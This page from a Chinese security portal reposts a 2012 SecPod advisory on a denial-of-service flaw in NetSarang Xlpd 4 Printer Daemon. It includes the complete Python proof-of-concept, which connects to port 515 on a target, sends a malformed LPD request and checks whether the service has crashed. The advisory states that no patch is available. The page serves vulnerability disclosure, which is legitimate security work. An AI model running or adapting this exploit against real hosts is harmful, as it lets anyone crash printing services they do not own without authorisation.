首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 NetSarang Xlpd Printer Daemon 4 Denial of Service Vulnerability 来源：http://secpod.org/blog/?p=457 作者：SecPod 发布时间：2012-02-03   ############################################################################## # # Title    : NetSarang Xlpd Printer Daemon Denial of Service Vulnerability # Author   : Prabhu S Angadi SecPod Technologies (www.secpod.com) # Vendor   : http://www.netsarang.com # Advisory : http://secpod.org/blog/?p=457 #            http://secpod.org/advisories/SecPod_Exploit_NetSarang_Xlpd_Printer_Daemon_DoS_Vuln.txt #            http://secpod.org/exploits/SecPod_Exploit_NetSarang_Xlpd_Printer_Daemon_DoS.py # Software : NetSarang Xlpd 4 Build 0100 and NetSarang Xmanager Enterprise 4 Build 0186 # Date     : 01/02/2012 # ############################################################################## SecPod ID: 1033     14/12/2011 Issue Discovered       20/01/2012 Vendor Notified       No Response       01/02/2012 Advisory Released Class: Denial Of Service   Severity: Medium Overview: --------- NetSarang Xlpd Printer Daemon version 4 is prone to a denial of service vulnerability. Technical Description: ---------------------- The vulnerability is caused due to improper validation of malicious LPD request sent to printer daemon, which allows remote attackers to crash the service. Impact: -------- Successful exploitation could allow an attacker to cause denial of service condition. Affected Software: ------------------ NetSarang Xlpd 4 Build 0100 NetSarang Xmanager Enterprise 4 Build 0186 Tested on: ----------- NetSarang Xlpd 4 Build 0100 on Windows XP SP3. NetSarang Xmanager Enterprise 4 Build 0186 on Windows XP SP3. Older versions might be affected. References: ----------- http://www.netsarang.com http://secpod.org/blog/?p=457 Proof of Concept: ---------------- http://secpod.org/exploits/SecPod_Exploit_NetSarang_Xlpd_Printer_Daemon_DoS.py Solution: ---------- Not available Risk Factor: -------------     CVSS Score Report:         ACCESS_VECTOR          = NETWORK         ACCESS_COMPLEXITY      = LOW         AUTHENTICATION         = NOT_REQUIRED         CONFIDENTIALITY_IMPACT = NONE         INTEGRITY_IMPACT       = NONE         AVAILABILITY_IMPACT    = PARTIAL         EXPLOITABILITY         = PROOF_OF_CONCEPT         REMEDIATION_LEVEL      = UNAVAILABLE         REPORT_CONFIDENCE      = CONFIRMED         CVSS Base Score        = 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)         Risk factor            = Medium Credits: -------- Prabhu S Angadi of SecPod Technologies has been credited with the discovery of this vulnerability. #!/usr/bin/python ############################################################################## # # Title    : NetSarang Xlpd Printer Daemon Denial of Service Vulnerability # Author   : Prabhu S Angadi SecPod Technologies (www.secpod.com) # Vendor   : http://www.netsarang.com # Advisory : http://secpod.org/blog/?p=457 #            http://secpod.org/advisories/SecPod_Exploit_NetSarang_Xlpd_Printer_Daemon_DoS_Vuln.txt #            http://secpod.org/exploits/SecPod_Exploit_NetSarang_Xlpd_Printer_Daemon_DoS.py # Software : NetSarang Xlpd 4 Build 0100 and NetSarang Xmanager Enterprise 4 Build 0186 # Date     : 01/02/2012 # ############################################################################## import socket,sys,time port = 515 if len(sys.argv) < 2:     print "\n[-] Usage: %s <target addr>" % sys.argv[0]     sys.exit(0) target = sys.argv[1] sockObj = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try:     sockObj.connect((target,port)) except:     print "\n[-] Xlpd service is down."     sys.exit(0) sockObj.send("crap"+"LF") sockObj.send("LF") #Will wait for a while time.sleep(5) sockObj.close() try:     sockObj.connect((target,port)) except:     print "\n[-] Xlpd service is crashed, unble to connect" sys.exit(0)   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·OfficeSIP Server 3.1 Denial Of ·Wireshark 1.4.4 Local Stack Bu ·Icona SpA C6 Messenger Downloa ·Wireshark 1.4.4 Remote Stack B ·Sunway Forcecontrol SNMP NetDB ·torrent-stats httpd.c Denial o ·windows xp sp2 [ arabic] mech ·HP 5.4SVN-2012-02-03 htmlspeci ·PHP 5.4.0RC6 64bit Denial of S ·frontpage_express2.02 Denial o ·Edraw Diagram Component 5 Acti ·Mindjet MindManager 2012 10.0.   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved